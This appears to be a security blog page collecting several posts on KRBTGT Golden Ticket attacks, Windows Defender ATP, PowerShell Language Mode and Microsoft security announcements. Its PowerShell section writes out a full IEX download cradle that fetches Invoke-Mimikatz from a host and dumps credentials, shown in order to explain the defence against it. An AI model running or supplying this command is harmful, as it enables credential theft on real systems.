KRBTGT is the Key Distribution Center Service Account, the object behind the Kerberos service at the core of Active Directory.
Nowadays we are exposed to many cyber-attacks that involve querying and manipulating the KRBTGT user.
A particularly popular one is the Golden Ticket attack.
Once an attacker has obtained the KRBTGT account password hash,
the attacker can create Golden Tickets.
It is important to understand that any existing Golden Tickets are no longer valid for use after the KRBTGT password is changed twice rapidly.
This invalidates the existing tickets and removes the attacker's ability to create valid Golden Tickets with the KRBTGT hash they hold.
Microsoft has taken several steps against cyber-attacks in recent years.
One of them was working out how to get detailed and complete information from the client to the cloud, with the ability to know what unusual actions were taking place on the client.
Windows Defender Security Center became the solution that manages the Windows Defender ATP client.
The client deployment and management capabilities are among the highest I've come across, in all the distribution issues and the ability to disrupt that deployment.
Signing the service with a certificate is the means Microsoft has chosen in order to prevent the user from interrupting or stopping it...
As we know, PowerShell can be much more than a scripting platform when it comes to administrative rights.
Running unsigned processes and scripts serves the attacker in advancing another step toward the objective.
Mimikatz and other painful tools are spotted by antivirus and antimalware, but when they bypass it, we are exposed to one of the most suspicious attack patterns in PowerShell today.
Using an IEX download cradle to fetch a new file is one of them.
Simply upload the PS script and run the following:
“IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds”
PowerShell can limit access to the above command by using Language Mode:
FullLanguage - permits all language elements...
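To see what Language Mode actually does to the cradle above, here is an added PowerShell example (not from the original post) that runs only the cradle's object-creation step in a throw-away runspace under each mode and reports whether it was allowed; it assumes Windows PowerShell 5.1, and the function name Test-CradleInLanguageMode is my own.

```powershell
function Test-CradleInLanguageMode {
    param(
        [Parameter(Mandatory)]
        [ValidateSet('FullLanguage', 'ConstrainedLanguage')]
        [string]$Mode
    )
    # Use a separate runspace: a live session can be lowered to
    # ConstrainedLanguage but never raised back, so never experiment in
    # the session you are working in.
    $iss = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
    $iss.LanguageMode = [System.Management.Automation.PSLanguageMode]$Mode
    $rs = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspace($iss)
    $rs.Open()
    $ps = [PowerShell]::Create()
    $ps.Runspace = $rs
    # Only the object-construction step of the cradle is exercised; nothing
    # is downloaded. In ConstrainedLanguage, New-Object is limited to core
    # types, so creating Net.WebClient fails before any request could be made.
    $probe = @'
try   { $null = New-Object Net.WebClient; 'allowed' }
catch { 'blocked: ' + $_.Exception.Message }
'@
    [void]$ps.AddScript($probe)
    $result = $ps.Invoke()
    $ps.Dispose()
    $rs.Close()
    return [string]$result[0]
}

# Report the mode of the current session, then the outcome under each mode.
"Current session: $($ExecutionContext.SessionState.LanguageMode)"
foreach ($m in 'FullLanguage', 'ConstrainedLanguage') {
    '{0,-19} -> {1}' -f $m, (Test-CradleInLanguageMode -Mode $m)
}
```

Checking `$ExecutionContext.SessionState.LanguageMode` on a host is the quickest way to confirm whether the restriction is actually in effect there.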
Today, Microsoft announced the next step in its efforts to protect enterprise customers, with a new service, Windows Defender Advanced Threat Protection,
Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud based security analytics, threat intelligence, and by tapping into Microsoft’s intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies – informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.
Microsoft has a strong, ongoing commitment to help customers stay safe in a world with ever-increasing threats from cyber criminals. As Satya announced last year and the Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help its customers stay secure.
Microsoft is excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection, that together give you a complete solution for monitoring and protecting enterprise cloud apps.
Check out the following link. These are some of the new capabilities included in Microsoft Advanced Threat Analytics Update 1.5:
Microsoft is nearing the finish line. Microsoft Advanced Threat Analytics will be generally available in August 2015:
A great session from last month's Microsoft Ignite 2015 by Mark Russinovich explaining how security components in cloud services are managed. Mark discusses shared responsibility from the IT and service provider perspectives, and also covers real examples of Microsoft working with customers to detect tenant breaches, correct issues and patch security vulnerabilities:
Last week the Microsoft Identity and Security Services Division announced that another new security report feature is now in preview; it helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.